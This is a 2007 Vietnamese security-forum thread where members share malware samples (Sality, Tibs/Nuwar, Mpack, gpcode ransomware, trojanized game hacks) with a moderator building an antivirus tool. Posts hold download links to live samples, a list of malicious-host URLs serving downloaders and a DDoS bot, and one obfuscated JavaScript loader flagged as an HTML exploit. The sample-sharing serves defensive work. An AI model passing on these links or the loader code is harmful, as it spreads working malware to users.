banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... Nhận mẫu virus  XML
  [Question]   Nhận mẫu virus 10/07/2007 16:17:01 (+0700) | #151 | 70262
LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]
Hôm qua, trên máy của thằng em quét được con Sality. Nó thuộc dạng virus chính hiệu: PE infection.
Bà con có hứng thú thì check, nhưng cẩn thận vì con này cũng hiểm, khả năng mã hóa cao. Hoàng chưa tìm được đoạn unique string của nó. Ngay cả BKAV, nó infect hết cả HDD rồi mà BKAV chỉ quét ra được vài file. Các AV nước ngoài thì dĩ nhiên là detect được smilie

Download tại đây:
http://www.freefileupload.net/file.php?file=files/090707/1184011975/keygen.zip

Đổi tên file thành .exe
[Locked] [Up] [Print Copy]
  [Question]   Re: Nhận mẫu virus 15/07/2007 04:35:09 (+0700) | #152 | 71236
[Avatar]
havythoai
HVA Friend

Joined: 05/04/2004 22:59:39
Messages: 562
Offline
[Profile] [PM] [WWW]

Ghost Ship wrote:

havythoai wrote:
Các bạn cho tôi hỏi là máy tính bị nhiễm 1 con virus cứ 5 phút là shutdown máy, cứ bật máy tính lên chơi khoảng 5 phút là tự động shutdown máy. Trường hợp này giải quyết thế nào nhỉ ? 


Shutdown từ từ hay là tắt phụt như cắt nguồn điện hả bác.

Nếu là shutdown từ từ thì Bác phải để ý xem có thôgn báo nào hiện ra kô, có hiện tượng nào bất thường nữa kô, nếu biết kiểm soát những Process đang chạy và thì phát hiện virus rất dễ.

Nếu tắt như cắt nguồn điện thì có thể xảy ra nếu quạt chíp có vấn đề. Chíp quá nóng cũng sẽ dẫn đến hiện tượng như vậy.

Máy em còn tắt phụt như cắt điện rồi lại khởi đôgnj lại ngay đây này. Chưa biết nguyên nhân vì sao. Hom trước em đã remove hết tất cả các ứng dụng để theo dõi và kô thấy như vậy nữa. kô biết do chương trình nào smilie(  

Máy của anh họ tôi nó ko hiện ra thông báo gì cả, cứ mở máy được khoảng 5 phút là tự động shutdown máy smilie
[Locked] [Up] [Print Copy]
  [Question]   Re: Nhận mẫu virus 16/07/2007 09:19:02 (+0700) | #153 | 71480
[Avatar]
tmd
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
Một mẫu tibs khác, FH của mod không nhận được nó. Một số hảng khác cũng không bắt được nó. Bao gồm symantec, F-Prot,mcafee,nod32... Quả là thằng sửa tibs quá rãnh rỗi.
http://w13.easy-share.com/1860351.html
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 16/07/2007 11:34:56 (+0700) | #154 | 71509
LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]
thank tmd, sẽ update.
hmm... sao cái file này bị hư rồi tmd ơi ?
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 17/07/2007 01:54:09 (+0700) | #155 | 71650
[Avatar]
tmd
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
Lần này là hết hư luôn. Một con tibs nửa. Download thẳng từ cái link trong cái spam mail kia.
Chưa thử ngoài dịch vụ con đó. Down về ngon ơ, symantec vừa cập nhật ngày hôm nay không lụm nó. Chết dịch thiệt.
http://w13.easy-share.com/1893831.html

Quả là kinh dị, thằng đó update con tibs hàng ngày, cách 1 ngày tui nhận được 1 mail có phiên bản mới. Quét online, chỉ thấy có vài hảng nhận mặt con mới, khá. 4 5 hảng lớn không biết. nod32,kav,fprot,symantec,mcafee đều bó tay.
Mỗi lần nó lấy một IP khác nhau, một host khác nhau để gửi đi.
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 17/07/2007 03:45:50 (+0700) | #156 | 71669
LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]
tác giả của con Tibs này cập nhật kinh quá...
[Locked] [Up] [Print Copy]
  [Question]   Re: Nhận mẫu virus 18/07/2007 23:21:22 (+0700) | #157 | 72082
pduydiep
Member

[Minus]    0    [Plus]
Joined: 18/07/2007 12:01:25
Messages: 2
Offline
[Profile] [PM]
bạn nào giúp mình diệt con này nhé http://www.freefileupload.net/file.php?file=files/180707/1184728557/mauvr.rar
Mình dùng bitdefender 10 thì nó báo là virus win32.worm.viking.ku nó báo là đã diệt được nhưng khi khởi đông lại thì nó vẫn cảnh báo là có virus nhưng diệt thì không có và nó tạo ra 1 loạt file có tên "file gốc".exe.exe.exe... như mẫu trên. mong được giúp đỡ
pass giải nén file mẫu là 123
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 19/07/2007 00:22:58 (+0700) | #158 | 72099
[Avatar]
tmd
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
Dùng cái LHT có hiren 9.1 để qúet, hên xui.
Tibs mới
http://www.freefileupload.net/file.php?file=files/180707/1184732120/ecard%281%29.exe
nhưng cũ.
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 19/07/2007 13:55:27 (+0700) | #159 | 72231
LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]
Hoàng vừa check file mauvr.rar của bạn, không bị nhiễm.
[Locked] [Up] [Print Copy]
  [Question]   Re: Nhận mẫu virus 20/07/2007 08:50:44 (+0700) | #160 | 72459
quanlypho
Member

[Minus]    0    [Plus]
Joined: 01/07/2006 21:19:20
Messages: 95
Offline
[Profile] [PM]
Bản NOD32 mà bạn tmd nói là phiên bản nào vậy ? Đừng nói là scan online nhá, mấy site đó vừa xài phiên bản cũ vừa không thật sự khách quan.

Con tibs ecard.exe mà tmd nói trên bị NOD32 phiên bản 2.7.39 lụm ngay:



Còn con patch.exe mà bác TQN phân tích ở trên cũng bị NOD32 2.7.23 phát hiện và chặn được (trước khi TQN phân tích luôn). Đó là đã tắt IMON chỉ dùng AMON và NOD32 Scan Manual, chứ nếu bật IMON lên thì nó đã phát hiện ngay khi save , và không cho tải về + diệt một số file tạm do virus tạo ra)

Cả 2 con này đều được NOD32 xếp vào họ Win32/Nuwar.Gen worm . Symantec thì sao so được với NOD32, ngay cả Kas còn ngửi khói...
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 24/07/2007 06:57:49 (+0700) | #161 | 73465
[Avatar]
tmd
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
cái đoạn code
<script language=JavaScript>function decipher(x)var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,6,18,12,24,42,41,19,47,50,0,0,0,0,0,0,62,33,43,3,49,4,9,10,59,16,58,26,27,39,46,45,15,38,7,31,32,13,2,14,34,55,54,0,0,0,0,11,0,25,40,44,57,21,30,20,8,37,17,48,60,28,29,0,56,52,23,53,61,1,35,51,5,22,36);for(j=Math.ceil(l/b);j>0;j--)r='';for(i=Math.min(l,b);i>0;i--,l--)w|=(t[x.charCodeAt(p++)-48])<<s;if(s)r+=String.fromCharCode(165^w&255);w>>=8;s-=2elses=6document.write(r)decipher("xQ6Do8mqoStQZBlsrwUAx989IrhHsrhwyrpDFBcDWCmk_Q6X1Cl9jClsLV")</script>  


Được một số hảng detect ra là HEUR/Exploit.HTML. Khai thác lỗi như theo thông báo ms40-40 của Microsoft .
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Locked] [Up] [Print Copy]
  [Question]   Re: Nhận mẫu virus 24/07/2007 14:56:35 (+0700) | #162 | 73536
[Avatar]
tmd
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
Upload cho mod một bản nguyên của cái Mpack.
http://www.freefileupload.net/file.php?file=files/230707/1185216753/malware.zip

Source nguyên này, FH không detect ra được, cũng có một số hảng cũng không detect ra được.
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 24/07/2007 16:17:02 (+0700) | #163 | 73540
LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]
Bản này giống bản Hoàng lấy được từ Offensive Computing. Sở dĩ không add source vào list là vì nó... vô hại, để đó mà.... ngâm cứu cũng được smilie. Mã này chỉ thuộc loại độc khi up lên host và có người dùng truy cập vào thôi.

Thank tmd
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 26/07/2007 10:49:55 (+0700) | #164 | 73966
[Avatar]
tmd
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
Lại tibs hoặc cái gì đó mới .
http://www.freefileupload.net/file.php?file=files/250707/1185374913/ecard.exe
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 27/07/2007 11:06:45 (+0700) | #165 | 74213
[Avatar]
Bí Danh NJ
Member

[Minus]    0    [Plus]
Joined: 24/07/2007 07:38:21
Messages: 111
Location: Một nơi nào đó
Offline
[Profile] [PM] [Yahoo!]
ecard.exe
-----------
Virus: TR/Crypt.XPACK.Gen
Type: Trojan
In the wild: Yes
Reported Infections: Low
Distribution Potential: Low
Damage Potential: Low
Static file: No
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 29/07/2007 01:50:41 (+0700) | #166 | 74686
[Avatar]
tmd
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
Nhatquanglan. Khi nào vào tù.
http://www.freefileupload.net/file.php?file=files/280707/1185601786/nhatquanglan.rar Lần này là w32.autorun.
Thông tin chi tiết của sunbelt về hoạt động của con autoit Nhatquanglan này, vẫn đang phát triển tiếp(nó chưa phát triển tới mức vào tù/dựa cột)

http://research.sunbelt-software.com/ViewMalware.aspx?id=1117106
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Locked] [Up] [Print Copy]
  [Question]   02/08/2007 15:11:22 (+0700) | #167 | 76075
LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]
Đã xử hết mấy con này. Thank all smilie
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 06/08/2007 05:09:24 (+0700) | #168 | 77081
[Avatar]
tmd
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
Lại tibs
http://www.freefileupload.net/file.php?file=files/050807/1186304735/ecard.exe

Nó muốn lên tới vài ngàn phiên bản mới thôi.
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Locked] [Up] [Print Copy]
  [Question]   Re: Nhận mẫu virus 07/08/2007 10:28:31 (+0700) | #169 | 77439
[Avatar]
tmd
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
Có người đã up lên một con gpcode, loại malware "tống tiền" gần đây.
http://www.freefileupload.net/file.php?file=files/060807/1186410470/gpcode%28ransom+malware%29.rar
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 09/08/2007 23:49:06 (+0700) | #170 | 78059
[Avatar]
tmd
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
Lại là tibs(hay nuwar gì đó)
http://www.freefileupload.net/file.php?file=files/090807/1186630451/ecard.exe
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 11/08/2007 08:59:36 (+0700) | #171 | 78368
thunder123
Member

[Minus]    0    [Plus]
Joined: 10/08/2007 21:29:04
Messages: 1
Offline
[Profile] [PM]
những mẩu vỉut này là sao
tác dụng của nó ?
em nghe nói
chát trên yahoo với người ta thả vỉut nó dc ko
[Locked] [Up] [Print Copy]
  [Question]   Re: Nhận mẫu virus 11/08/2007 10:48:25 (+0700) | #172 | 78387
[Avatar]
tmd
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
BKAV cũng vui tính, những thông tin mà một con downloader mà nước ngoài gọi là small gì đó. BKAV còn đưa ra vô số ẻm khác mà cái host evilman.vn, gặp các hảng nước ngoài khác, là hide ngay thông tin nhạy cảm này.


http://evilman.cn/m2.txt

ht tp://evilman.cn/0x/01.exe
htt p://evilman.cn/0x/02.exe
htt p://evilman.cn/0x/03.exe
ht tp://evilman.cn/0x/Bot.exe
ht tp://evilman.cn/0x/ad4462.exe
h ttp://evilman.cn/0x/my_70086.exe
http://evilman.cn/0x/boolan93.exe
ht tp://evilman.cn/0x/dodolook260.exe  


Nhưng từ google, lại có vô số các thứ khác. Có thể bkav quên các thứ này.

ht tp://evilman.cn/mm.js
ht tp://evilman.cn/main.htm
ht tp://evilman.cn/mm.exe 


Có thể 3 cái này là những em đi đầu tiên. Trong các thứ mà nó download về, có một thứ bot.exe mà nước ngoài gọi là DDOS.
http://www.freefileupload.net/file.php?file=files/100807/1186757342/evilman.vn.rar
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Locked] [Up] [Print Copy]
  [Question]   Re: Nhận mẫu virus 11/08/2007 12:16:53 (+0700) | #173 | 78402
[Avatar]
tmd
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
Lần này là Võ lâm truyền kỳ dài tập.
http://www.freefileupload.net/file.php?file=files/100807/1186762562/Vulanpro307.zip
trong cái file vulanpro.exe
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 12/08/2007 15:54:12 (+0700) | #174 | 78543
LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]
Dạo này cái freefileupload.net không down được tmd ơi.
[Locked] [Up] [Print Copy]
  [Question]   Re: Nhận mẫu virus 13/08/2007 12:34:17 (+0700) | #175 | 78572
[Avatar]
tmd
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
Tui quên. Cái file evilman đó vẫn còn lấy được khi cái trang evilman.net kia chưa bị BAN. Mod cứ download bằng trình download nào đó cũng được. Trong đó còn một link http: //evilman.cn/1.html(cái thứ này đủ code để lừa người ta)

Còn cái file bên dưới,cái hack hiết VLTK, tui lấy từ thùng rác của forum thuvientinhoc.com. Forum này có một admin là một mod của hva.

Hôm nay HVA bị DDOS hay update lâu quá.
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 13/08/2007 17:03:23 (+0700) | #176 | 78589
LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]
Tụi ăn cắp password account giờ ghê quá, không những dùng 1 keylogger mà còn dùng những 3 con smilie). Hoàng detect được trong cái VLAuto:

[Locked] [Up] [Print Copy]
  [Question]   Re: Nhận mẫu virus 13/08/2007 21:14:23 (+0700) | #177 | 78612
[Avatar]
tmd
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
Đây là những gì tui download được từ cái evilman.cn đó.
Nó được đưa vào blacklist của một số nơi rồi. Vậy mà ISP hay gì gì đó chưa có ban . Chuyện lạ.
http://w13.easy-share.com/3070251.html
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Locked] [Up] [Print Copy]
  [Question]   Re: Nhận mẫu virus 14/08/2007 05:39:42 (+0700) | #178 | 78697
nguoinapdanhhk
Member

[Minus]    0    [Plus]
Joined: 04/12/2006 19:40:16
Messages: 3
Offline
[Profile] [PM] [WWW]
Hi
Hien nay minh cung can mot so mau trojan, virus, worm...
hay dai loai nhu vay
Neu Anh Hoang thay khong ranh co the share no cho em , de em giai quyet cho.
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 14/08/2007 12:20:03 (+0700) | #179 | 78774
LeVuHoang
HVA Friend

Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]
Tức là bạn update db giúp Hoàng ?
[Locked] [Up] [Print Copy]
  [Question]   Nhận mẫu virus 15/08/2007 07:35:20 (+0700) | #180 | 78966
Un-Known
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 02:25:57
Messages: 22
Offline
[Profile] [PM]
Fire-Lion của anh Hoàng (updated ngày 14/08/2007) không diệt được con W32.RontokbroBK
Triệu chứng :
- Khóa Registry
- Mở Task manager lên, vào phần Process để xem, thì chưa kịp kill process thì nó đã bị tắt mất . Và sau đó là một màn hình kiểu console nó hiện lên 1 tí rồi tắt
- Vào Windows Explorer, vừa chọn tab View File để chọn Show all hidden files thì nó tắt luôn WE.

[Locked] [Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|